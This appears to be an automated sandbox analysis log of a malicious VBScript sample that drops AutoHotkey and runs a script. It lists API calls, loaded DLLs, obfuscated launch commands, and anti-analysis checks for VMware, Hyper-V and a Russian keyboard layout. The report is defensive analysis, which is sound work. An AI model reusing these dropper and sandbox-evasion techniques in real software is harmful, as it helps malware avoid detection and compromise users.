            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0043A140 appears 78 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 00409044 appears 36 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0047FFB0 appears 67 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0049A3AA appears 60 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0484520D appears 34 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 048454ED appears 97 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0049A90E appears 35 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 04844F7D appears 101 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 0043A420 appears 283 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 00499C29 appears 342 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 04847581 appears 77 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 004A7DD0 appears 51 times
            Source: ndvdikok.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@3/7@1/1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0043B100 GetFileAttributesW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,__swprintf,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,1_2_0043B100
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045F410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_0045F410
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00449810 _wcsncpy,GetDiskFreeSpaceExW,1_2_00449810
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045F620 CreateToolhelp32Snapshot,Process32FirstW,__wcstoi64,Process32NextW,__wsplitpath,__wcsicoll,Process32NextW,CloseHandle,CloseHandle,CloseHandle,1_2_0045F620
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,1_2_0045E220
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00481EC0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,ExtractIconW,1_2_00481EC0
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fykbmgsz[1]Jump to behavior
            Source: C:\NwiQ\AutoHotkey.exeFile created: C:\temp\Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs"
            Source: C:\NwiQ\AutoHotkey.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: ndvdikok.vbsVirustotal: Detection: 15%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: zipfldr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: shdocvw.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winshfhc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winshfhc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: winmm.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: version.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: wininet.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: netutils.dllJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run(""c:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"", "1", "false");
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A5040 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004A5040
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0049F0E5 push ecx; ret 1_2_0049F0F8
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004AB418 push eax; ret 1_2_004AB436
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04878489 push 048784B5h; ret 1_2_048784AD
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0485F4A5 push 0485F4D1h; ret 1_2_0485F4C9
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489A4A9 push 0489A4EBh; ret 1_2_0489A4E3
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048954E5 push 04895511h; ret 1_2_04895509
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486F4E9 push 0486F515h; ret 1_2_0486F50D
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048724F9 push ecx; mov dword ptr [esp], ecx1_2_048724FE
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486D419 push 0486D445h; ret 1_2_0486D43D
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0487146D push 048714D7h; ret 1_2_048714CF
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486E471 push 0486E4B3h; ret 1_2_0486E4AB
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04868505 push 04868531h; ret 1_2_04868529
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489A52D push 0489A559h; ret 1_2_0489A551
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04878531 push 0487855Dh; ret 1_2_04878555
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0484E565 push 0484E6E1h; ret 1_2_0484E6D9
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486A691 push 0486A6BDh; ret 1_2_0486A6B5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048966A5 push 048966D1h; ret 1_2_048966C9
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048676C5 push 048676F1h; ret 1_2_048676E9
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486A6C9 push 0486A6F5h; ret 1_2_0486A6ED
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0484E6E5 push 0484E754h; ret 1_2_0484E74C
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0484E6E3 push 0484E754h; ret 1_2_0484E74C
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048676FD push 04867729h; ret 1_2_04867721
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04858615 push ecx; mov dword ptr [esp], edx1_2_04858617
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04896629 push 0489665Ch; ret 1_2_04896654
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486578D push 048657B6h; ret 1_2_048657AE
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04867795 push 048677C1h; ret 1_2_048677B9
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489779D push 048977DDh; ret 1_2_048977D5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489E791 push 0489E7B7h; ret 1_2_0489E7AF
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0484E79D push 0484E7C9h; ret 1_2_0484E7C1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048677CD push 048677F9h; ret 1_2_048677F1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0485B7D9 push 0485B805h; ret 1_2_0485B7FD
            Source: C:\Windows\System32\wscript.exeFile created: C:\NwiQ\AutoHotkey.exeJump to dropped file
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00484030 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,1_2_00484030
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00484160 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,1_2_00484160
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004442E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free,1_2_004442E0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045C3A0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,__swprintf,1_2_0045C3A0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004813B0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,1_2_004813B0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00481410 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,1_2_00481410
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004427E0 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongW,__swprintf,GetModuleHandleW,GetProcAddress,__swprintf,1_2_004427E0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0046C900 GetWindowLongW,GetWindowLongW,GetWindowLongW,__wcsnicmp,__wcsnicmp,__wcsicoll,SetWindowPos,__wcsicoll,__wcsicoll,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,EnableWindow,__wcsnicmp,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsnicmp,MulDiv,MulDiv,__wcsnicmp,MulDiv,MulDiv,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcstoi64,IsWindow,SetParent,SetWindowLongW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,1_2_0046C900
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00443AD0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,__swprintf,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC,1_2_00443AD0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00446BC0 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,_memset,EnumChildWindows,GetClassNameW,EnumChildWindows,1_2_00446BC0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00473B90 SendMessageW,SendMessageW,SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageW,SendMessageW,ShowWindow,SetFocus,InvalidateRect,InvalidateRect,InvalidateRect,MapWindowPoints,InvalidateRect,1_2_00473B90
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0046FCD0 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,1_2_0046FCD0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0046FCD0 SetWindowTextW,IsZoomed,IsIconic,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,1_2_0046FCD0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00445D30 SendMessageW,SendMessageW,SendMessageW,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,1_2_00445D30
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0485D5DD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0485D5DD
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SUPERANTISPYWARE.EXE
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeEvaded block: after key decisiongraph_1-104188
            Source: C:\NwiQ\AutoHotkey.exeAPI coverage: 3.0 %
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004191F0 GetKeyboardLayout followed by cmp: cmp cl, 00000019h and CTI: ja 004192ECh country: Russian (ru)1_2_004191F0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0040C240 GetKeyboardLayout followed by cmp: cmp dword ptr [004db42ch], edi and CTI: je 0040C414h1_2_0040C240
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00480DC0 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,1_2_00480DC0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,1_2_0045E220
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0047C320 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,1_2_0047C320
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044D570 FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__swprintf,FindNextFileW,FindClose,1_2_0044D570
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044D870 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,1_2_0044D870
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00437B70 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose,1_2_00437B70
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044DBB0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,1_2_0044DBB0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00480D30 FindFirstFileW,FindClose,GetFileAttributesW,1_2_00480D30
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045EEA0 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,_wcsrchr,_wcsrchr,_wcsncpy,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose,1_2_0045EEA0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048495A1 FindFirstFileA,GetLastError,1_2_048495A1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489C541 FindFirstFileW,FindNextFileW,FindClose,1_2_0489C541
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0484655D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,1_2_0484655D
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489B145 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,1_2_0489B145
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04876FE5 FindFirstFileW,FindNextFileW,FindClose,1_2_04876FE5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04873871 FindFirstFileW,FindNextFileW,FindClose,1_2_04873871
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04871EA9 GetSystemInfo,1_2_04871EA9
            Source: AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: vmware
            Source: wscript.exe, 00000000.00000003.1651614571.000001D5A5F25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Registry\Machine\Software\Classes\SystemFileAssociations\compressed\SystemFileAssociations\compressed}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}stem32
            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
            Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660535194.000001D5A5EE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
            Source: AutoHotkey.exe, 00000001.00000002.1665231870.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\NwiQ\AutoHotkey.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00416450 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,BlockInput,GetForegroundWindow,GetAsyncKeyState,keybd_event,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,BlockInput,1_2_00416450
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0049E2D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0049E2D5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A5040 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004A5040
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486A0F5 mov eax, dword ptr fs:[00000030h]1_2_0486A0F5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486A0F5 mov eax, dword ptr fs:[00000030h]1_2_0486A0F5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04867B0D mov eax, dword ptr fs:[00000030h]1_2_04867B0D
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048B3EEA mov eax, dword ptr fs:[00000030h]1_2_048B3EEA
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A93DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_004A93DE
